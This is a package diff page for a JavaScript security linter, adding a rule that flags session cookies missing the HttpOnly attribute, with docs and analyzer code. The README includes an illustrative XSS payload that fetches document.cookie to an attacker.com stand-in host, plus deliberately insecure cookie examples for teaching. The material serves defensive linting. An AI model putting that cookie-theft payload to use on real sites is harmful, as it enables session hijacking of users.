npm - @sun-asterisk/sunlint - Versions diffs - 1.3.2 → 1.3.4 - Mend

@sun-asterisk/sunlint 1.3.2 → 1.3.4

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (60) hide show

package/rules/security/S032_httponly_session_cookies/FRAMEWORK_SUPPORT.md ADDED Viewed

@@ -0,0 +1,209 @@
+# S032 Framework Support Enhancement
+## Overview
+S032 rule "Set HttpOnly attribute for Session Cookies" has been enhanced to support multiple JavaScript/TypeScript frameworks including **NestJS**, **Next.js**, and **Nuxt.js**.
+## Supported Frameworks
+### 🔹 **NestJS**
+- **Patterns Detected:**
+  - `@Res() response: Response` decorator usage
+  - `response.cookie()` method calls
+  - NestJS controller method patterns
+- **Session Cookies Identified:**
+  - `nest-session`, `nest-auth`
+  - Standard session cookies in NestJS context
+- **Example Violations:**
+```typescript
+@Post('login')
+async login(@Res() response: Response) {
+  response.cookie('sessionid', 'value', {
+    secure: true,
+    sameSite: 'strict',
+    // Missing: httpOnly: true ❌
+  });
+}
+```
+### 🔹 **Next.js**
+- **Patterns Detected:**
+  - `NextResponse.cookies.set()` calls
+  - `cookies().set()` from next/headers
+  - Traditional `res.cookie()` in API routes
+  - NextAuth configuration
+- **Session Cookies Identified:**
+  - `next-auth.session-token`, `next-auth.csrf-token`
+  - `__Host-next-auth.*`, `__Secure-next-auth.*`
+  - Standard session cookies in Next.js context
+- **Example Violations:**
+```typescript
+export async function POST(request: NextRequest) {
+  const response = NextResponse.next();
+  response.cookies.set("sessionid", "value", {
+    secure: true,
+    sameSite: "strict",
+    // Missing: httpOnly: true ❌
+  });
+}
+```
+### 🔹 **Nuxt.js**
+- **Patterns Detected:**
+  - `useCookie()` composable calls
+  - `setCookie()` server-side functions
+  - `$cookies.set()` patterns
+  - H3 cookie handling
+- **Session Cookies Identified:**
+  - `nuxt-session`, `nuxt-auth`
+  - `auth._token`, `auth._refresh_token`
+  - Standard session cookies in Nuxt.js context
+- **Example Violations:**
+```typescript
+export function useSessionCookie() {
+  const sessionId = useCookie("sessionid", {
+    secure: true,
+    sameSite: "strict",
+    // Missing: httpOnly: true ❌
+  });
+}
+```
+## Enhanced Detection Capabilities
+### 📊 **Regex Patterns Added:**
+```javascript
+// NestJS patterns
+/@Res\(\)\s*\.cookie\s*\(/gi
+/response\s*:\s*Response\)\s*{\s*[^}]*response\.cookie\s*\(/gi
+// Next.js patterns
+/NextResponse\.next\(\)\.cookies\.set\s*\(/gi
+/cookies\(\)\.set\s*\(/gi
+/\.cookies\.set\s*\(/gi
+// Nuxt.js patterns
+/useCookie\s*\(/gi
+/\$cookies\.set\s*\(/gi
+/setCookie\s*\(/gi
+```
+### 🎯 **Session Cookie Indicators Expanded:**
+```javascript
+// Framework-specific session cookies
+"nest-session",
+  "nest-auth", // NestJS
+  "next-auth.session-token",
+  "next-auth.csrf-token", // Next.js
+  "nuxt-session",
+  "nuxt-auth",
+  "auth._token", // Nuxt.js
+  "access_token",
+  "refresh_token",
+  "id_token"; // General
+```
+### 🔍 **Smart Framework Detection:**
+- **Import Analysis:** Detects framework from import statements
+- **Decorator Recognition:** Identifies NestJS decorators like `@Res()`
+- **Method Context:** Recognizes framework-specific method patterns
+- **File Patterns:** Analyzes file structure for framework hints
+## Test Coverage
+### ✅ **Violation Detection:**
+- **NestJS:** 17 violations detected in test file
+- **Next.js:** 9 violations detected in test file
+- **Nuxt.js:** 8 violations detected in test file
+### ✅ **Secure Examples:**
+- All framework clean examples pass with 0 violations
+- Proper `httpOnly: true` configuration recognized
+## Implementation Details
+### 🔧 **Enhanced Analyzers:**
+1. **Regex-Based Analyzer:**
+   - Added framework-specific patterns
+   - Enhanced session cookie detection
+   - Framework-aware violation messages
+2. **Symbol-Based Analyzer:**
+   - Extended method name detection
+   - Framework context recognition
+   - AST-based analysis for complex patterns
+### 📝 **Configuration Updates:**
+```json
+{
+  "cookieLibraries": [
+    "nestjs",
+    "@nestjs/common",
+    "@nestjs/core",
+    "next-auth",
+    "nuxt-auth",
+    "@nuxt/auth",
+    "@nuxtjs/auth"
+  ],
+  "insecurePatterns": [
+    "@Res\\(\\).cookie\\([^)]*\\)(?![^{]*httpOnly)",
+    "NextResponse\\.next\\(\\)(?![^{]*httpOnly)",
+    "useCookie\\([^)]*\\)(?![^{]*httpOnly)"
+  ]
+}
+```
+## Benefits
+1. **Comprehensive Coverage:** Supports major modern web frameworks
+2. **Smart Detection:** Recognizes framework-specific patterns and conventions
+3. **Accurate Analysis:** Reduces false positives through context awareness
+4. **Developer Friendly:** Provides framework-specific violation messages
+5. **Future Ready:** Extensible architecture for additional frameworks
+## Usage Examples
+### Run S032 on framework-specific files:
+```bash
+# Test NestJS violations
+sunlint --rule=S032 --input=nestjs_violations.ts
+# Test Next.js violations
+sunlint --rule=S032 --input=nextjs_violations.ts
+# Test Nuxt.js violations
+sunlint --rule=S032 --input=nuxtjs_violations.ts
+# Test all frameworks
+sunlint --rule=S032 --input=framework_projects/
+```
+This enhancement ensures S032 provides robust session cookie security validation across the modern JavaScript/TypeScript ecosystem! 🚀

package/rules/security/S032_httponly_session_cookies/README.md ADDED Viewed

@@ -0,0 +1,184 @@
+# S032 - Set HttpOnly attribute for Session Cookies
+## Rule Description
+**S032** ensures that session cookies have the `HttpOnly` attribute set to prevent JavaScript access. This protects against XSS attacks by preventing client-side script access to sensitive cookies, reducing the risk of cookie theft.
+## Security Impact
+- **High**: Session cookies without HttpOnly can be accessed via JavaScript in XSS attacks
+- **Attack Vector**: Cross-Site Scripting (XSS), malicious scripts
+- **Compliance**: OWASP Top 10, security best practices
+## Detection Patterns
+### Vulnerable Code Examples
+```javascript
+// ❌ Express.js - Missing HttpOnly attribute
+res.cookie("sessionid", sessionValue, {
+  secure: true,
+  // Missing: httpOnly: true
+});
+// ❌ Set-Cookie header - No HttpOnly attribute
+res.setHeader("Set-Cookie", "sessionid=abc123; Secure");
+// ❌ Document.cookie - Accessible by JavaScript
+document.cookie = "auth=token123; path=/; Secure";
+// ❌ Session middleware - Missing HttpOnly
+app.use(
+  session({
+    secret: "secret-key",
+    name: "sessionid",
+    cookie: {
+      secure: true,
+      // Missing: httpOnly: true
+    },
+  })
+);
+// ❌ Explicitly disabled HttpOnly
+res.cookie("jwt", tokenValue, {
+  secure: true,
+  httpOnly: false, // Explicitly vulnerable
+});
+```
+### Secure Code Examples
+```javascript
+// ✅ Express.js - With HttpOnly attribute
+res.cookie("sessionid", sessionValue, {
+  httpOnly: true,
+  secure: true,
+  sameSite: "strict",
+});
+// ✅ Set-Cookie header - With HttpOnly attribute
+res.setHeader("Set-Cookie", "sessionid=abc123; HttpOnly; Secure");
+// ✅ Session middleware - Secure configuration
+app.use(
+  session({
+    secret: "secret-key",
+    name: "sessionid",
+    cookie: {
+      httpOnly: true,
+      secure: true,
+      sameSite: "strict",
+    },
+  })
+);
+// ✅ Complete security configuration
+res.cookie("auth", authToken, {
+  httpOnly: true,
+  secure: process.env.NODE_ENV === "production",
+  sameSite: "strict",
+  maxAge: 3600000, // 1 hour
+});
+```
+## Session Cookie Indicators
+The rule detects cookies that are likely session-related based on:
+- **Cookie Names**: `session`, `sessionid`, `sessid`, `jsessionid`, `phpsessid`
+- **Framework Patterns**: `connect.sid`, `asp.net_sessionid`
+- **Authentication**: `auth`, `token`, `jwt`, `csrf`, `refresh`
+## Supported Frameworks
+- **Express.js**: `res.cookie()`, `res.setHeader()`
+- **Koa**: Cookie setting methods
+- **Fastify**: Cookie plugins
+- **Next.js**: API routes cookie handling
+- **Native**: `document.cookie`, Set-Cookie headers
+## Configuration
+The rule can be configured in `config.json`:
+```json
+{
+  "validation": {
+    "sessionIndicators": ["session", "sessionid", "auth", "token", "refresh"],
+    "cookieMethods": ["setCookie", "cookie", "setHeader"],
+    "httpOnlyPatterns": ["httpOnly:\\s*true", "HttpOnly"]
+  }
+}
+```
+## HttpOnly vs XSS Protection
+### Without HttpOnly (Vulnerable)
+```javascript
+// JavaScript can access this cookie
+document.cookie; // "sessionid=abc123; auth=token456"
+// XSS payload can steal cookies
+<script>fetch('https://attacker.com/steal?cookie=' + document.cookie);</script>;
+```
+### With HttpOnly (Protected)
+```javascript
+// JavaScript cannot access HttpOnly cookies
+document.cookie; // Only shows non-HttpOnly cookies
+// XSS attacks cannot steal session cookies
+<script>
+  // This will not include HttpOnly cookies
+  fetch('https://attacker.com/steal?cookie=' + document.cookie);
+</script>;
+```
+## Best Practices
+1. **Always use HttpOnly for session cookies**
+2. **Combine with Secure flag** for HTTPS-only transmission
+3. **Use SameSite attribute** for CSRF protection
+4. **Complete security configuration**:
+   ```javascript
+   res.cookie("session", value, {
+     httpOnly: true, // Prevent JavaScript access
+     secure: true, // HTTPS only
+     sameSite: "strict", // CSRF protection
+     maxAge: 3600000, // Expiration
+   });
+   ```
+## Exception Cases
+Some legitimate use cases may require JavaScript access:
+```javascript
+// ✅ Non-session cookies for UI preferences
+res.cookie("theme", "dark", {
+  // httpOnly: false is acceptable here
+  secure: true,
+  sameSite: "lax",
+});
+// ✅ CSRF tokens that need JavaScript access
+res.cookie("csrf-token", csrfToken, {
+  // httpOnly: false for AJAX requests
+  secure: true,
+  sameSite: "strict",
+});
+```
+## Related Rules
+- **S031**: Secure flag for cookies
+- **S033**: SameSite attribute for CSRF protection
+- **S034**: Cookie expiration and domain settings
+## References
+- [OWASP Session Management](https://owasp.org/www-project-cheat-sheets/cheatsheets/Session_Management_Cheat_Sheet.html)
+- [MDN HttpOnly Cookies](https://developer.mozilla.org/en-US/docs/Web/HTTP/Cookies#restrict_access_to_cookies)
+- [OWASP XSS Prevention](https://owasp.org/www-project-cheat-sheets/cheatsheets/Cross_Site_Scripting_Prevention_Cheat_Sheet.html)

package/rules/security/S032_httponly_session_cookies/analyzer.js ADDED Viewed

@@ -0,0 +1,282 @@
+/**
+ * S032 Main Analyzer - Set HttpOnly attribute for Session Cookies
+ * Primary: Symbol-based analysis (when available)
+ * Fallback: Regex-based for all other cases
+ * Command: node cli.js --rule=S032 --input=examples/rule-test-fixtures/rules/S032_httponly_session_cookies --engine=heuristic
+ */
+const S032SymbolBasedAnalyzer = require("./symbol-based-analyzer.js");
+const S032RegexBasedAnalyzer = require("./regex-based-analyzer.js");
+class S032Analyzer {
+  constructor(options = {}) {
+    if (process.env.SUNLINT_DEBUG) {
+      console.log(`🔧 [S032] Constructor called with options:`, !!options);
+      console.log(
+        `🔧 [S032] Options type:`,
+        typeof options,
+        Object.keys(options || {})
+      );
+    }
+    this.ruleId = "S032";
+    this.ruleName = "Set HttpOnly attribute for Session Cookies";
+    this.description =
+      "Set HttpOnly attribute for Session Cookies to prevent JavaScript access. This protects against XSS attacks by preventing client-side script access to sensitive cookies.";
+    this.semanticEngine = options.semanticEngine || null;
+    this.verbose = options.verbose || false;
+    // Configuration
+    this.config = {
+      useSymbolBased: true, // Primary approach
+      fallbackToRegex: true, // Secondary approach
+      regexBasedOnly: false, // Can be set to true for pure mode
+    };
+    // Initialize analyzers
+    try {
+      this.symbolAnalyzer = new S032SymbolBasedAnalyzer(this.semanticEngine);
+      if (process.env.SUNLINT_DEBUG) {
+        console.log(`🔧 [S032] Symbol analyzer created successfully`);
+      }
+    } catch (error) {
+      console.error(`🔧 [S032] Error creating symbol analyzer:`, error);
+    }
+    try {
+      this.regexAnalyzer = new S032RegexBasedAnalyzer(this.semanticEngine);
+      if (process.env.SUNLINT_DEBUG) {
+        console.log(`🔧 [S032] Regex analyzer created successfully`);
+      }
+    } catch (error) {
+      console.error(`🔧 [S032] Error creating regex analyzer:`, error);
+    }
+  }
+  /**
+   * Initialize analyzer with semantic engine
+   */
+  async initialize(semanticEngine) {
+    this.semanticEngine = semanticEngine;
+    if (process.env.SUNLINT_DEBUG) {
+      console.log(`🔧 [S032] Main analyzer initializing...`);
+    }
+    // Initialize both analyzers
+    if (this.symbolAnalyzer) {
+      await this.symbolAnalyzer.initialize?.(semanticEngine);
+    }
+    if (this.regexAnalyzer) {
+      await this.regexAnalyzer.initialize?.(semanticEngine);
+    }
+    // Clean up if needed
+    if (this.regexAnalyzer) {
+      this.regexAnalyzer.cleanup?.();
+    }
+    if (process.env.SUNLINT_DEBUG) {
+      console.log(`🔧 [S032] Main analyzer initialized successfully`);
+    }
+  }
+  /**
+   * Single file analysis method for testing
+   */
+  analyzeSingle(filePath, options = {}) {
+    if (process.env.SUNLINT_DEBUG) {
+      console.log(`🔍 [S032] analyzeSingle() called for: ${filePath}`);
+    }
+    // Return result using same format as analyze method
+    return this.analyze([filePath], "typescript", options);
+  }
+  async analyze(files, language, options = {}) {
+    if (process.env.SUNLINT_DEBUG) {
+      console.log(
+        `🔧 [S032] analyze() method called with ${files.length} files, language: ${language}`
+      );
+    }
+    const violations = [];
+    for (const filePath of files) {
+      try {
+        if (process.env.SUNLINT_DEBUG) {
+          console.log(`🔧 [S032] Processing file: ${filePath}`);
+        }
+        const fileViolations = await this.analyzeFile(filePath, options);
+        violations.push(...fileViolations);
+        if (process.env.SUNLINT_DEBUG) {
+          console.log(
+            `🔧 [S032] File ${filePath}: Found ${fileViolations.length} violations`
+          );
+        }
+      } catch (error) {
+        console.warn(
+          `⚠ [S032] Analysis failed for ${filePath}:`,
+          error.message
+        );
+      }
+    }
+    if (process.env.SUNLINT_DEBUG) {
+      console.log(`🔧 [S032] Total violations found: ${violations.length}`);
+    }
+    return violations;
+  }
+  async analyzeFile(filePath, options = {}) {
+    if (process.env.SUNLINT_DEBUG) {
+      console.log(`🔍 [S032] analyzeFile() called for: ${filePath}`);
+    }
+    // Create a Map to track unique violations and prevent duplicates
+    const violationMap = new Map();
+    // 1. Try Symbol-based analysis first (primary)
+    if (
+      this.config.useSymbolBased &&
+      this.semanticEngine?.project &&
+      this.semanticEngine?.initialized
+    ) {
+      try {
+        if (process.env.SUNLINT_DEBUG) {
+          console.log(`🔧 [S032] Trying symbol-based analysis...`);
+        }
+        const sourceFile = this.semanticEngine.project.getSourceFile(filePath);
+        if (sourceFile) {
+          if (process.env.SUNLINT_DEBUG) {
+            console.log(`🔧 [S032] Source file found, analyzing...`);
+          }
+          const symbolViolations = await this.symbolAnalyzer.analyze(
+            sourceFile,
+            filePath
+          );
+          // Add to violation map with deduplication
+          symbolViolations.forEach((violation) => {
+            // Create a location-specific key to allow multiple violations for same cookie at different locations
+            const cookieName = this.extractCookieName(violation.message) || "";
+            const key = `cookie:${cookieName}:line:${violation.line}:httponly`;
+            if (!violationMap.has(key)) {
+              violationMap.set(key, violation);
+            }
+          });
+          if (process.env.SUNLINT_DEBUG) {
+            console.log(
+              `🔧 [S032] Symbol analysis completed: ${symbolViolations.length} violations`
+            );
+          }
+        } else {
+          if (process.env.SUNLINT_DEBUG) {
+            console.log(`🔧 [S032] Source file not found, falling back...`);
+          }
+        }
+      } catch (error) {
+        console.warn(`⚠ [S032] Symbol analysis failed:`, error.message);
+      }
+    }
+    // 2. Try Regex-based analysis (fallback or additional)
+    if (this.config.fallbackToRegex || this.config.regexBasedOnly) {
+      try {
+        if (process.env.SUNLINT_DEBUG) {
+          console.log(`🔧 [S032] Trying regex-based analysis...`);
+        }
+        const regexViolations = await this.regexAnalyzer.analyze(filePath);
+        // Add to violation map with deduplication
+        regexViolations.forEach((violation) => {
+          // Create a location-specific key to allow multiple violations for same cookie at different locations
+          const cookieName = this.extractCookieName(violation.message) || "";
+          const key = `cookie:${cookieName}:line:${violation.line}:httponly`;
+          // Priority: If we already have a violation for this cookie at this line, prefer symbol analyzer result
+          if (!violationMap.has(key)) {
+            violationMap.set(key, violation);
+          } else {
+            const existing = violationMap.get(key);
+            // Prefer framework-specific messages (Nuxt, NestJS, Next.js) over generic ones
+            if (
+              this.isFrameworkSpecificMessage(violation.message) &&
+              !this.isFrameworkSpecificMessage(existing.message)
+            ) {
+              violationMap.set(key, violation);
+            }
+          }
+        });
+        if (process.env.SUNLINT_DEBUG) {
+          console.log(
+            `🔧 [S032] Regex analysis completed: ${regexViolations.length} violations`
+          );
+        }
+      } catch (error) {
+        console.warn(`⚠ [S032] Regex analysis failed:`, error.message);
+      }
+    }
+    // Convert Map values to array and add filePath to each violation
+    const finalViolations = Array.from(violationMap.values()).map(
+      (violation) => ({
+        ...violation,
+        filePath: filePath,
+        file: filePath, // Also add 'file' for compatibility
+      })
+    );
+    if (process.env.SUNLINT_DEBUG) {
+      console.log(
+        `🔧 [S032] File analysis completed: ${finalViolations.length} unique violations`
+      );
+    }
+    return finalViolations;
+  }
+  /**
+   * Extract cookie name from violation message for better deduplication
+   */
+  extractCookieName(message) {
+    try {
+      const match = message.match(
+        /Session cookie "([^"]+)"|useCookie "([^"]+)"|Cookie "([^"]+)"/
+      );
+      return match ? match[1] || match[2] || match[3] : "";
+    } catch (error) {
+      return "";
+    }
+  }
+  /**
+   * Check if message is framework-specific (preferred over generic)
+   */
+  isFrameworkSpecificMessage(message) {
+    return (
+      message.includes("Nuxt useCookie") ||
+      message.includes("NestJS") ||
+      message.includes("Next.js") ||
+      message.includes("Framework")
+    );
+  }
+  /**
+   * Clean up resources
+   */
+  cleanup() {
+    if (this.symbolAnalyzer?.cleanup) {
+      this.symbolAnalyzer.cleanup();
+    }
+    if (this.regexAnalyzer?.cleanup) {
+      this.regexAnalyzer.cleanup();
+    }
+  }
+}
+module.exports = S032Analyzer;